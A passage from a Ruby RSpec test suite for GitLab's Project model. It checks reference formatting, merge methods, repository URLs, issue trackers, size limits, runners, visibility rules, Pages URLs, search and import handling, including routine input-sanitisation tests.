expect(project.to_reference(group)).to eq 'sample-namespace/sample-project'
end
end
end
end
describe '#to_human_reference' do
let(:owner) { create(:user, name: 'Gitlab') }
let(:namespace) { create(:namespace, name: 'Sample namespace', owner: owner) }
let(:project) { create(:project, name: 'Sample project', namespace: namespace) }
context 'when nil argument' do
it 'returns nil' do
expect(project.to_human_reference).to be_nil
end
end
context 'when same project argument' do
it 'returns nil' do
expect(project.to_human_reference(project)).to be_nil
end
end
context 'when cross namespace project argument' do
let(:another_namespace_project) { create(:project, name: 'another-project') }
it 'returns complete name with namespace of the project' do
expect(project.to_human_reference(another_namespace_project)).to eq 'Gitlab / Sample project'
end
end
context 'when same namespace / cross-project argument' do
let(:another_project) { create(:project, namespace: namespace) }
it 'returns name of the project' do
expect(project.to_human_reference(another_project)).to eq 'Sample project'
end
end
end
describe '#merge_method' do
using RSpec::Parameterized::TableSyntax
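# Note the precedence in the table below: when both flags are set, ff wins over rebase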
where(:ff, :rebase, :method) do
true | true | :ff
true | false | :ff
false | true | :rebase_merge
false | false | :merge
end
with_them do
let(:project) { build(:project, merge_requests_rebase_enabled: rebase, merge_requests_ff_only_enabled: ff) }
subject { project.merge_method }
it { is_expected.to eq(method) }
end
end
it 'returns a valid url to the repo' do
project = described_class.new(path: 'somewhere')
expect(project.url_to_repo).to eq(Gitlab.config.gitlab_shell.ssh_path_prefix + 'somewhere.git')
end
describe "#web_url" do
let(:project) { create(:project, path: "somewhere") }
it 'returns the full web URL for this repo' do
expect(project.web_url).to eq("#{Gitlab.config.gitlab.url}/#{project.namespace.full_path}/somewhere")
end
end
describe "#kerberos_url_to_repo" do
let(:project) { create(:project, path: "somewhere") }
it 'returns valid kerberos url for this repo' do
expect(project.kerberos_url_to_repo).to eq("#{Gitlab.config.build_gitlab_kerberos_url}/#{project.namespace.path}/somewhere.git")
end
end
describe "#readme_url" do
let(:project) { create(:project, :repository, path: "somewhere") }
context 'with a non-existing repository' do
it 'returns nil' do
allow(project.repository).to receive(:tree).with(:head).and_return(nil)
expect(project.readme_url).to be_nil
end
end
context 'with an existing repository' do
context 'when no README exists' do
it 'returns nil' do
allow_any_instance_of(Tree).to receive(:readme).and_return(nil)
expect(project.readme_url).to be_nil
end
end
context 'when a README exists' do
it 'returns the README' do
expect(project.readme_url).to eql("#{Gitlab.config.gitlab.url}/#{project.namespace.full_path}/somewhere/blob/master/README.md")
end
end
end
end
describe "#new_issuable_address" do
let(:project) { create(:project, path: "somewhere") }
let(:user) { create(:user) }
context 'incoming email enabled' do
before do
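# %{key} expands to the project full path, an optional issuable type, and the user's incoming email token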
stub_incoming_email_setting(enabled: true, address: "p+%{key}@gl.ab")
end
it 'returns the address to create a new issue' do
address = "p+#{project.full_path}+#{user.incoming_email_token}@gl.ab"
expect(project.new_issuable_address(user, 'issue')).to eq(address)
end
it 'returns the address to create a new merge request' do
address = "p+#{project.full_path}+merge-request+#{user.incoming_email_token}@gl.ab"
expect(project.new_issuable_address(user, 'merge_request')).to eq(address)
end
end
context 'incoming email disabled' do
before do
stub_incoming_email_setting(enabled: false)
end
it 'returns nil' do
expect(project.new_issuable_address(user, 'issue')).to be_nil
end
it 'returns nil' do
expect(project.new_issuable_address(user, 'merge_request')).to be_nil
end
end
end
describe 'last_activity methods' do
let(:timestamp) { 2.hours.ago }
# last_activity_at gets set to created_at upon creation
let(:project) { create(:project, created_at: timestamp, updated_at: timestamp) }
describe 'last_activity' do
it 'aliases last_activity to last_event' do
last_event = create(:event, :closed, project: project)
expect(project.last_activity).to eq(last_event)
end
end
describe 'last_activity_date' do
it 'returns the creation date of the project\'s last event if present' do
new_event = create(:event, :closed, project: project, created_at: Time.now)
project.reload
expect(project.last_activity_at.to_i).to eq(new_event.created_at.to_i)
end
it 'returns the project\'s last update date if it has no events' do
expect(project.last_activity_date).to eq(project.updated_at)
end
it 'returns the most recent timestamp' do
project.update_attributes(updated_at: nil,
last_activity_at: timestamp,
last_repository_updated_at: timestamp - 1.hour)
expect(project.last_activity_date).to eq(timestamp)
project.update_attributes(updated_at: timestamp,
last_activity_at: timestamp - 1.hour,
last_repository_updated_at: nil)
expect(project.last_activity_date).to eq(timestamp)
end
end
end
describe '#get_issue' do
let(:project) { create(:project) }
let!(:issue) { create(:issue, project: project) }
let(:user) { create(:user) }
before do
project.add_developer(user)
end
context 'with default issues tracker' do
it 'returns an issue' do
expect(project.get_issue(issue.iid, user)).to eq issue
end
it 'returns count of open issues' do
expect(project.open_issues_count).to eq(1)
end
it 'returns nil when no issue found' do
expect(project.get_issue(999, user)).to be_nil
end
it "returns nil when user doesn't have access" do
user = create(:user)
expect(project.get_issue(issue.iid, user)).to eq nil
end
end
context 'with external issues tracker' do
let!(:internal_issue) { create(:issue, project: project) }
before do
allow(project).to receive(:external_issue_tracker).and_return(true)
end
context 'when internal issues are enabled' do
it 'returns the internal issue' do
issue = project.get_issue(internal_issue.iid, user)
expect(issue).to be_kind_of(Issue)
expect(issue.iid).to eq(internal_issue.iid)
expect(issue.project).to eq(project)
end
it 'returns an ExternalIssue when the internal issue does not exist' do
issue = project.get_issue('FOO-1234', user)
expect(issue).to be_kind_of(ExternalIssue)
expect(issue.iid).to eq('FOO-1234')
expect(issue.project).to eq(project)
end
end
context 'when internal issues are disabled' do
before do
project.issues_enabled = false
project.save!
end
it 'always returns an ExternalIssue' do
issue = project.get_issue(internal_issue.iid, user)
expect(issue).to be_kind_of(ExternalIssue)
expect(issue.iid).to eq(internal_issue.iid.to_s)
expect(issue.project).to eq(project)
end
it 'returns an ExternalIssue when the internal issue does not exist' do
issue = project.get_issue('FOO-1234', user)
expect(issue).to be_kind_of(ExternalIssue)
expect(issue.iid).to eq('FOO-1234')
expect(issue.project).to eq(project)
end
end
end
end
describe '#issue_exists?' do
let(:project) { create(:project) }
it 'is truthy when issue exists' do
expect(project).to receive(:get_issue).and_return(double)
expect(project.issue_exists?(1)).to be_truthy
end
it 'is falsey when issue does not exist' do
expect(project).to receive(:get_issue).and_return(nil)
expect(project.issue_exists?(1)).to be_falsey
end
end
describe '#to_param' do
context 'with namespace' do
before do
@group = create(:group, name: 'gitlab')
@project = create(:project, name: 'gitlabhq', namespace: @group)
end
it { expect(@project.to_param).to eq('gitlabhq') }
end
context 'with invalid path' do
it 'returns previous path to keep project suitable for use in URLs when persisted' do
project = create(:project, path: 'gitlab')
project.path = 'foo&bar'
expect(project).not_to be_valid
expect(project.to_param).to eq 'gitlab'
end
it 'returns current path when new record' do
project = build(:project, path: 'gitlab')
project.path = 'foo&bar'
expect(project).not_to be_valid
expect(project.to_param).to eq 'foo&bar'
end
end
end
describe '#repository' do
let(:project) { create(:project, :repository) }
it 'returns a valid repo' do
expect(project.repository).to be_kind_of(Repository)
end
end
describe 'repository size restrictions' do
let(:project) { build(:project) }
before do
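# Application-wide limit that the group- and project-level settings below override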
allow_any_instance_of(ApplicationSetting).to receive(:repository_size_limit).and_return(50)
end
describe '#changes_will_exceed_size_limit?' do
before do
allow(project).to receive(:repository_and_lfs_size).and_return(49)
end
it 'returns true when changes go over' do
expect(project.changes_will_exceed_size_limit?(5)).to be_truthy
end
end
describe '#actual_size_limit' do
it 'returns the limit set in the application settings' do
expect(project.actual_size_limit).to eq(50)
end
it 'returns the value set in the group' do
group = create(:group, repository_size_limit: 100)
project.update_attribute(:namespace_id, group.id)
expect(project.actual_size_limit).to eq(100)
end
it 'returns the value set locally' do
project.update_attribute(:repository_size_limit, 75)
expect(project.actual_size_limit).to eq(75)
end
end
describe '#size_limit_enabled?' do
it 'returns false when disabled' do
project.update_attribute(:repository_size_limit, 0)
expect(project.size_limit_enabled?).to be_falsey
end
it 'returns true when a limit is set' do
project.update_attribute(:repository_size_limit, 75)
expect(project.size_limit_enabled?).to be_truthy
end
end
describe '#above_size_limit?' do
let(:project) do
create(:project,
statistics: build(:project_statistics))
end
it 'returns true when above the limit' do
allow(project).to receive(:repository_and_lfs_size).and_return(100)
expect(project.above_size_limit?).to be_truthy
end
it 'returns false when not over the limit' do
expect(project.above_size_limit?).to be_falsey
end
end
describe '#size_to_remove' do
it 'returns the correct value' do
allow(project).to receive(:repository_and_lfs_size).and_return(100)
expect(project.size_to_remove).to eq(50)
end
end
end
describe '#repository_size_limit column' do
it 'supports values up to 8 exabytes' do
project = create(:project)
project.update_column(:repository_size_limit, 8.exabytes - 1)
project.reload
expect(project.repository_size_limit).to eql(8.exabytes - 1)
end
end
describe '#default_issues_tracker?' do
it "is true if used internal tracker" do
project = build(:project)
expect(project.default_issues_tracker?).to be_truthy
end
it "is false if used other tracker" do
# NOTE: The current nature of this factory requires persistence
project = create(:redmine_project)
expect(project.default_issues_tracker?).to be_falsey
end
end
describe '#empty_repo?' do
context 'when the repo does not exist' do
let(:project) { build_stubbed(:project) }
it 'returns true' do
expect(project.empty_repo?).to be(true)
end
end
context 'when the repo exists' do
let(:project) { create(:project, :repository) }
let(:empty_project) { create(:project, :empty_repo) }
it { expect(empty_project.empty_repo?).to be(true) }
it { expect(project.empty_repo?).to be(false) }
end
end
describe '#external_issue_tracker' do
let(:project) { create(:project) }
let(:ext_project) { create(:redmine_project) }
context 'on existing projects with no value for has_external_issue_tracker' do
before do
project.update_column(:has_external_issue_tracker, nil)
ext_project.update_column(:has_external_issue_tracker, nil)
end
it 'updates the has_external_issue_tracker boolean' do
expect do
project.external_issue_tracker
end.to change { project.reload.has_external_issue_tracker }.to(false)
expect do
ext_project.external_issue_tracker
end.to change { ext_project.reload.has_external_issue_tracker }.to(true)
end
end
it 'returns nil and does not query services when there is no external issue tracker' do
expect(project).not_to receive(:services)
expect(project.external_issue_tracker).to eq(nil)
end
it 'retrieves external_issue_tracker querying services and cache it when there is external issue tracker' do
ext_project.reload # Factory returns a project with changed attributes
expect(ext_project).to receive(:services).once.and_call_original
2.times { expect(ext_project.external_issue_tracker).to be_a_kind_of(RedmineService) }
end
end
describe '#cache_has_external_issue_tracker' do
let(:project) { create(:project, has_external_issue_tracker: nil) }
it 'stores true if there is an external issue tracker' do
services = double(:service, external_issue_trackers: [RedmineService.new])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_issue_tracker
end.to change { project.has_external_issue_tracker }.to(true)
end
it 'stores false if there is no external issue tracker' do
services = double(:service, external_issue_trackers: [])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_issue_tracker
end.to change { project.has_external_issue_tracker }.to(false)
end
it 'does not cache data when in a read-only GitLab instance' do
allow(Gitlab::Database).to receive(:read_only?) { true }
expect do
project.cache_has_external_issue_tracker
end.not_to change { project.has_external_issue_tracker }
end
end
describe '#cache_has_external_wiki' do
let(:project) { create(:project, has_external_wiki: nil) }
it 'stores true if there are any external wikis' do
services = double(:service, external_wikis: [ExternalWikiService.new])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_wiki
end.to change { project.has_external_wiki }.to(true)
end
it 'stores false if there are no external wikis' do
services = double(:service, external_wikis: [])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_wiki
end.to change { project.has_external_wiki }.to(false)
end
it 'does not cache data when in a read-only GitLab instance' do
allow(Gitlab::Database).to receive(:read_only?) { true }
expect do
project.cache_has_external_wiki
end.not_to change { project.has_external_wiki }
end
end
describe '#has_wiki?' do
let(:no_wiki_project) { create(:project, :wiki_disabled, has_external_wiki: false) }
let(:wiki_enabled_project) { create(:project) }
let(:external_wiki_project) { create(:project, has_external_wiki: true) }
it 'returns true if project is wiki enabled or has external wiki' do
expect(wiki_enabled_project).to have_wiki
expect(external_wiki_project).to have_wiki
expect(no_wiki_project).not_to have_wiki
end
end
describe '#external_wiki' do
let(:project) { create(:project) }
context 'with an active external wiki' do
before do
create(:service, project: project, type: 'ExternalWikiService', active: true)
project.external_wiki
end
it 'sets :has_external_wiki as true' do
expect(project.has_external_wiki).to be(true)
end
it 'sets :has_external_wiki as false if an external wiki service is destroyed later' do
expect(project.has_external_wiki).to be(true)
project.services.external_wikis.first.destroy
expect(project.has_external_wiki).to be(false)
end
end
context 'with an inactive external wiki' do
before do
create(:service, project: project, type: 'ExternalWikiService', active: false)
end
it 'sets :has_external_wiki as false' do
expect(project.has_external_wiki).to be(false)
end
end
context 'with no external wiki' do
before do
project.external_wiki
end
it 'sets :has_external_wiki as false' do
expect(project.has_external_wiki).to be(false)
end
it 'sets :has_external_wiki as true if an external wiki service is created later' do
expect(project.has_external_wiki).to be(false)
create(:service, project: project, type: 'ExternalWikiService', active: true)
expect(project.has_external_wiki).to be(true)
end
end
end
describe '#star_count' do
it 'counts stars from multiple users' do
user1 = create(:user)
user2 = create(:user)
project = create(:project, :public)
expect(project.star_count).to eq(0)
user1.toggle_star(project)
expect(project.reload.star_count).to eq(1)
user2.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(2)
user1.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(1)
user2.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(0)
end
it 'counts stars on the right project' do
user = create(:user)
project1 = create(:project, :public)
project2 = create(:project, :public)
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
user.toggle_star(project1)
project1.reload
project2.reload
expect(project1.star_count).to eq(1)
expect(project2.star_count).to eq(0)
user.toggle_star(project1)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
user.toggle_star(project2)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(1)
user.toggle_star(project2)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
end
end
describe '#avatar_type' do
let(:project) { create(:project) }
it 'is truthy if the avatar is an image' do
project.update_attribute(:avatar, 'uploads/avatar.png')
expect(project.avatar_type).to be_truthy
end
it 'returns a format error if the avatar is an HTML page' do
project.update_attribute(:avatar, 'uploads/avatar.html')
expect(project.avatar_type).to eq(['file format is not supported. Please try one of the following supported formats: png, jpg, jpeg, gif, bmp, tiff'])
end
end
describe '#avatar_url' do
subject { project.avatar_url }
let(:project) { create(:project) }
context 'when avatar file is uploaded' do
let(:project) { create(:project, :public, :with_avatar) }
it 'shows correct url' do
expect(project.avatar_url).to eq(project.avatar.url)
expect(project.avatar_url(only_path: false)).to eq([Gitlab.config.gitlab.url, project.avatar.url].join)
end
end
context 'when the avatar file is in git' do
before do
allow(project).to receive(:avatar_in_git) { true }
end
let(:avatar_path) { "/#{project.full_path}/avatar" }
it { is_expected.to eq "http://#{Gitlab.config.gitlab.host}#{avatar_path}" }
end
context 'when git repo is empty' do
let(:project) { create(:project) }
it { is_expected.to eq nil }
end
end
describe '#pipeline_for' do
let(:project) { create(:project, :repository) }
let!(:pipeline) { create_pipeline }
shared_examples 'giving the correct pipeline' do
it { is_expected.to eq(pipeline) }
context 'return latest' do
let!(:pipeline2) { create_pipeline }
it { is_expected.to eq(pipeline2) }
end
end
context 'with explicit sha' do
subject { project.pipeline_for('master', pipeline.sha) }
it_behaves_like 'giving the correct pipeline'
end
context 'with implicit sha' do
subject { project.pipeline_for('master') }
it_behaves_like 'giving the correct pipeline'
end
def create_pipeline
create(:ci_pipeline,
project: project,
ref: 'master',
sha: project.commit('master').sha)
end
end
describe '#builds_enabled' do
let(:project) { create(:project) }
subject { project.builds_enabled }
it { expect(project.builds_enabled?).to be_truthy }
end
describe '.with_shared_runners' do
subject { described_class.with_shared_runners }
context 'when shared runners are enabled for project' do
let!(:project) { create(:project, shared_runners_enabled: true) }
it "returns a project" do
is_expected.to eq([project])
end
end
context 'when shared runners are disabled for project' do
let!(:project) { create(:project, shared_runners_enabled: false) }
it "returns an empty array" do
is_expected.to be_empty
end
end
end
describe '.cached_count', :use_clean_rails_memory_store_caching do
let(:group) { create(:group, :public) }
let!(:project1) { create(:project, :public, group: group) }
let!(:project2) { create(:project, :public, group: group) }
it 'returns total project count' do
expect(described_class).to receive(:count).once.and_call_original
3.times do
expect(described_class.cached_count).to eq(2)
end
end
end
describe '.trending' do
let(:group) { create(:group, :public) }
let(:project1) { create(:project, :public, group: group) }
let(:project2) { create(:project, :public, group: group) }
before do
2.times do
create(:note_on_commit, project: project1)
end
create(:note_on_commit, project: project2)
TrendingProject.refresh!
end
subject { described_class.trending.to_a }
it 'sorts projects by the amount of notes in descending order' do
expect(subject).to eq([project1, project2])
end
it 'does not take system notes into account' do
10.times do
create(:note_on_commit, project: project2, system: true)
end
expect(described_class.trending.to_a).to eq([project1, project2])
end
end
describe '.starred_by' do
it 'returns only projects starred by the given user' do
user1 = create(:user)
user2 = create(:user)
project1 = create(:project)
project2 = create(:project)
create(:project)
user1.toggle_star(project1)
user2.toggle_star(project2)
expect(described_class.starred_by(user1)).to contain_exactly(project1)
end
end
describe '.visible_to_user' do
let!(:project) { create(:project, :private) }
let!(:user) { create(:user) }
subject { described_class.visible_to_user(user) }
describe 'when a user has access to a project' do
before do
project.add_user(user, Gitlab::Access::MASTER)
end
it { is_expected.to eq([project]) }
end
describe 'when a user does not have access to any projects' do
it { is_expected.to eq([]) }
end
end
context 'repository storage by default' do
let(:project) { build(:project) }
before do
storages = {
'default' => Gitlab::GitalyClient::StorageSettings.new('path' => 'tmp/tests/repositories'),
'picked' => Gitlab::GitalyClient::StorageSettings.new('path' => 'tmp/tests/repositories')
}
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
it 'picks storage from ApplicationSetting' do
expect_any_instance_of(ApplicationSetting).to receive(:pick_repository_storage).and_return('picked')
expect(project.repository_storage).to eq('picked')
end
end
context 'shared runners by default' do
let(:project) { create(:project) }
subject { project.shared_runners_enabled }
context 'are enabled' do
before do
stub_application_setting(shared_runners_enabled: true)
end
it { is_expected.to be_truthy }
end
context 'are disabled' do
before do
stub_application_setting(shared_runners_enabled: false)
end
it { is_expected.to be_falsey }
end
end
describe '#any_runners?' do
context 'shared runners' do
let(:project) { create(:project, shared_runners_enabled: shared_runners_enabled) }
let(:specific_runner) { create(:ci_runner, :project, projects: [project]) }
let(:shared_runner) { create(:ci_runner, :instance) }
context 'for shared runners disabled' do
let(:shared_runners_enabled) { false }
it 'has no runners available' do
expect(project.any_runners?).to be_falsey
end
it 'has a specific runner' do
specific_runner
expect(project.any_runners?).to be_truthy
end
it 'has a shared runner, but it is prohibited from use' do
shared_runner
expect(project.any_runners?).to be_falsey
end
it 'checks the presence of specific runner' do
specific_runner
expect(project.any_runners? { |runner| runner == specific_runner }).to be_truthy
end
it 'returns false if match cannot be found' do
specific_runner
expect(project.any_runners? { false }).to be_falsey
end
end
context 'for shared runners enabled' do
let(:shared_runners_enabled) { true }
it 'has a shared runner' do
shared_runner
expect(project.any_runners?).to be_truthy
end
it 'checks the presence of shared runner' do
shared_runner
expect(project.any_runners? { |runner| runner == shared_runner }).to be_truthy
end
it 'returns false if match cannot be found' do
shared_runner
expect(project.any_runners? { false }).to be_falsey
end
end
end
context 'group runners' do
let(:project) { create(:project, group_runners_enabled: group_runners_enabled) }
let(:group) { create(:group, projects: [project]) }
let(:group_runner) { create(:ci_runner, :group, groups: [group]) }
context 'for group runners disabled' do
let(:group_runners_enabled) { false }
it 'has no runners available' do
expect(project.any_runners?).to be_falsey
end
it 'has a group runner, but it is prohibited from use' do
group_runner
expect(project.any_runners?).to be_falsey
end
end
context 'for group runners enabled' do
let(:group_runners_enabled) { true }
it 'has a group runner' do
group_runner
expect(project.any_runners?).to be_truthy
end
it 'checks the presence of group runner' do
group_runner
expect(project.any_runners? { |runner| runner == group_runner }).to be_truthy
end
it 'returns false if match cannot be found' do
group_runner
expect(project.any_runners? { false }).to be_falsey
end
end
end
end
describe '#shared_runners' do
let!(:runner) { create(:ci_runner, :instance) }
subject { project.shared_runners }
context 'when shared runners are enabled for project' do
let!(:project) { create(:project, shared_runners_enabled: true) }
it "returns a list of shared runners" do
is_expected.to eq([runner])
end
end
context 'when shared runners are disabled for project' do
let!(:project) { create(:project, shared_runners_enabled: false) }
it "returns a empty list" do
is_expected.to be_empty
end
end
end
describe '#visibility_level_allowed?' do
let(:project) { create(:project, :internal) }
context 'when checking on non-forked project' do
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::PRIVATE)).to be_truthy }
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_truthy }
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_truthy }
end
context 'when checking on forked project' do
let(:project) { create(:project, :internal) }
let(:forked_project) { create(:project, forked_from_project: project) }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PRIVATE)).to be_truthy }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_truthy }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_falsey }
end
end
describe '#pages_deployed?' do
let(:project) { create(:project) }
subject { project.pages_deployed? }
context 'when the public folder exists' do
before do
allow(Dir).to receive(:exist?).with(project.public_pages_path).and_return(true)
end
it { is_expected.to be_truthy }
end
context "if public folder doesn't exist" do
it { is_expected.to be_falsey }
end
end
describe '#pages_url' do
let(:group) { create(:group, name: group_name) }
let(:project) { create(:project, namespace: group, name: project_name) }
let(:domain) { 'Example.com' }
subject { project.pages_url }
before do
allow(Settings.pages).to receive(:host).and_return(domain)
allow(Gitlab.config.pages).to receive(:url).and_return('http://example.com')
end
context 'group page' do
let(:group_name) { 'Group' }
let(:project_name) { 'group.example.com' }
it { is_expected.to eq("http://group.example.com") }
end
context 'project page' do
let(:group_name) { 'Group' }
let(:project_name) { 'Project' }
it { is_expected.to eq("http://group.example.com/project") }
end
end
describe '#pages_group_url' do
let(:group) { create(:group, name: group_name) }
let(:project) { create(:project, namespace: group, name: project_name) }
let(:domain) { 'Example.com' }
let(:port) { 1234 }
subject { project.pages_group_url }
before do
allow(Settings.pages).to receive(:host).and_return(domain)
allow(Gitlab.config.pages).to receive(:url).and_return("http://example.com:#{port}")
end
context 'group page' do
let(:group_name) { 'Group' }
let(:project_name) { 'group.example.com' }
it { is_expected.to eq("http://group.example.com:#{port}") }
end
context 'project page' do
let(:group_name) { 'Group' }
let(:project_name) { 'Project' }
it { is_expected.to eq("http://group.example.com:#{port}") }
end
end
describe '.search' do
let(:project) { create(:project, description: 'kitten mittens') }
it 'returns projects with a matching name' do
expect(described_class.search(project.name)).to eq([project])
end
it 'returns projects with a partially matching name' do
expect(described_class.search(project.name[0..2])).to eq([project])
end
it 'returns projects with a matching name regardless of the casing' do
expect(described_class.search(project.name.upcase)).to eq([project])
end
it 'returns projects with a matching description' do
expect(described_class.search(project.description)).to eq([project])
end
it 'returns projects with a partially matching description' do
expect(described_class.search('kitten')).to eq([project])
end
it 'returns projects with a matching description regardless of the casing' do
expect(described_class.search('KITTEN')).to eq([project])
end
it 'returns projects with a matching path' do
expect(described_class.search(project.path)).to eq([project])
end
it 'returns projects with a partially matching path' do
expect(described_class.search(project.path[0..2])).to eq([project])
end
it 'returns projects with a matching path regardless of the casing' do
expect(described_class.search(project.path.upcase)).to eq([project])
end
describe 'with pending_delete project' do
let(:pending_delete_project) { create(:project, pending_delete: true) }
it 'returns projects pending deletion' do
search_result = described_class.search(pending_delete_project.name)
expect(search_result).to eq([pending_delete_project])
end
end
end
describe '#expire_caches_before_rename' do
let(:project) { create(:project, :repository) }
let(:repo) { double(:repo, exists?: true) }
let(:wiki) { double(:wiki, exists?: true) }
it 'expires the caches of the repository and wiki' do
allow(Repository).to receive(:new)
.with('foo', project)
.and_return(repo)
allow(Repository).to receive(:new)
.with('foo.wiki', project)
.and_return(wiki)
expect(repo).to receive(:before_delete)
expect(wiki).to receive(:before_delete)
project.expire_caches_before_rename('foo')
end
end
describe '.search_by_title' do
let(:project) { create(:project, name: 'kittens') }
it 'returns projects with a matching name' do
expect(described_class.search_by_title(project.name)).to eq([project])
end
it 'returns projects with a partially matching name' do
expect(described_class.search_by_title('kitten')).to eq([project])
end
it 'returns projects with a matching name regardless of the casing' do
expect(described_class.search_by_title('KITTENS')).to eq([project])
end
end
context 'when checking projects from groups' do
let(:private_group) { create(:group, visibility_level: 0) }
let(:internal_group) { create(:group, visibility_level: 10) }
let(:private_project) { create(:project, :private, group: private_group) }
let(:internal_project) { create(:project, :internal, group: internal_group) }
context 'when group is private project can not be internal' do
it { expect(private_project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_falsey }
end
context 'when group is internal project can not be public' do
it { expect(internal_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_falsey }
end
end
describe '#create_repository' do
let(:project) { create(:project, :repository) }
let(:shell) { Gitlab::Shell.new }
before do
allow(project).to receive(:gitlab_shell).and_return(shell)
end
context 'using a regular repository' do
it 'creates the repository' do
expect(shell).to receive(:create_repository)
.with(project.repository_storage, project.disk_path)
.and_return(true)
expect(project.repository).to receive(:after_create)
expect(project.create_repository).to eq(true)
end
it 'adds an error if the repository could not be created' do
expect(shell).to receive(:create_repository)
.with(project.repository_storage, project.disk_path)
.and_return(false)
expect(project.repository).not_to receive(:after_create)
expect(project.create_repository).to eq(false)
expect(project.errors).not_to be_empty
end
end
context 'using a forked repository' do
it 'does nothing' do
expect(project).to receive(:forked?).and_return(true)
expect(shell).not_to receive(:create_repository)
project.create_repository
end
end
end
describe '#ensure_repository' do
let(:project) { create(:project, :repository) }
let(:shell) { Gitlab::Shell.new }
before do
allow(project).to receive(:gitlab_shell).and_return(shell)
end
it 'creates the repository if it does not exist' do
allow(project).to receive(:repository_exists?)
.and_return(false)
allow(shell).to receive(:create_repository)
.with(project.repository_storage, project.disk_path)
.and_return(true)
expect(project).to receive(:create_repository).with(force: true)
project.ensure_repository
end
it 'does not create the repository if it exists' do
allow(project).to receive(:repository_exists?)
.and_return(true)
expect(project).not_to receive(:create_repository)
project.ensure_repository
end
it 'creates the repository if it is a fork' do
expect(project).to receive(:forked?).and_return(true)
allow(project).to receive(:repository_exists?)
.and_return(false)
expect(shell).to receive(:create_repository)
.with(project.repository_storage, project.disk_path)
.and_return(true)
project.ensure_repository
end
end
describe 'handling import URL' do
context 'when project is a mirror' do
it 'returns the full URL' do
project = create(:project, :mirror, import_url: 'http://user:[email protected]')
project.import_finish
expect(project.reload.import_url).to eq('http://user:[email protected]')
end
end
context 'when project is not a mirror' do
it 'returns the sanitized URL' do
project = create(:project, :import_started, import_url: 'http://user:[email protected]')
project.import_finish
expect(project.reload.import_url).to eq('http://test.com')
end
end
end
describe '#container_registry_url' do
let(:project) { create(:project) }
subject { project.container_registry_url }
before do
stub_container_registry_config(**registry_settings)
end
context 'for enabled registry' do
let(:registry_settings) do
{ enabled: true,
host_port: 'example.com' }
end
it { is_expected.not_to be_nil }
end
context 'for disabled registry' do
let(:registry_settings) do
{ enabled: false }
end
it { is_expected.to be_nil }
end
end
describe '#has_container_registry_tags?' do
let(:project) { create(:project) }
context 'when container registry is enabled' do
before do
stub_container_registry_config(enabled: true)
end
context 'when tags are present for multi-level registries' do
before do
create(:container_repository, project: project, name: 'image')
stub_container_registry_tags(repository: /image/,
tags: %w[latest rc1])
end
it 'has image tags' do
expect(project).to have_container_registry_tags
end
end
context 'when tags are present for root repository' do
before do
stub_container_registry_tags(repository: project.full_path,
tags: %w[latest rc1 pre1])
end
it 'has image tags' do
expect(project).to have_container_registry_tags
end
end
context 'when there are no tags at all' do
before do
stub_container_registry_tags(repository: :any, tags: [])
end
it 'does not have image tags' do
expect(project).not_to have_container_registry_tags
end
end
end
context 'when container registry is disabled' do
before do
stub_container_registry_config(enabled: false)
end
it 'does not have image tags' do
expect(project).not_to have_container_registry_tags
end
it 'does not check root repository tags' do
expect(project).not_to receive(:full_path)
expect(project).not_to have_container_registry_tags
end
it 'iterates through container repositories' do
expect(project).to receive(:container_repositories)
expect(project).not_to have_container_registry_tags
end
end
end
describe '#ci_config_path=' do
let(:project) { create(:project) }
it 'sets nil' do
project.update!(ci_config_path: nil)
expect(project.ci_config_path).to be_nil
end
it 'sets a string' do
project.update!(ci_config_path: 'foo/.gitlab_ci.yml')
expect(project.ci_config_path).to eq('foo/.gitlab_ci.yml')
end
it 'sets a string but removes all null characters' do
project.update!(ci_config_path: "f\0oo/\0/.gitlab_ci.yml")
expect(project.ci_config_path).to eq('foo//.gitlab_ci.yml')
end
end
describe 'Project import job' do
let(:project) { create(:project, import_url: generate(:url)) }
before do
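# Stub the gitlab-shell import so the job can finish without network access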
allow_any_instance_of(Gitlab::Shell).to receive(:import_repository)
.with(project.repository_storage, project.disk_path, project.import_url)
.and_return(true)
expect_any_instance_of(Repository).to receive(:after_import)
.and_call_original
end
it 'imports a project' do
expect_any_instance_of(RepositoryImportWorker).to receive(:perform).and_call_original
expect { project.import_schedule }.to change { project.import_jid }
expect(project.reload.import_status).to eq('finished')
end
context 'with a mirrored project' do
let(:project) { create(:project, :mirror) }
it 'calls RepositoryImportWorker and inserts in front of the mirror scheduler queue' do
allow_any_instance_of(described_class).to receive(:repository_exists?).and_return(false, true)
expect_any_instance_of(EE::Project).to receive(:force_import_job!)
expect_any_instance_of(RepositoryImportWorker).to receive(:perform).with(project.id).and_call_original
expect { project.import_schedule }.to change { project.import_jid }
end
end
end
describe 'project import state transitions' do
context 'state transition: [:started] => [:finished]' do
let(:after_import_service) { spy(:after_import_service) }
let(:housekeeping_service) { spy(:housekeeping_service) }
before do
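# Stub the after-import and housekeeping services so we can assert they run on import_finish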
allow(Projects::AfterImportService)
.to receive(:new) { after_import_service }
allow(after_import_service)
.to receive(:execute) { housekeeping_service.execute }
allow(Projects::HousekeepingService)
.to receive(:new) { housekeeping_service }
end
it 'resets project import_error' do
error_message = 'Some error'
mirror = create(:project_empty_repo, :import_started)
mirror.import_state.update_attributes(last_error: error_message)
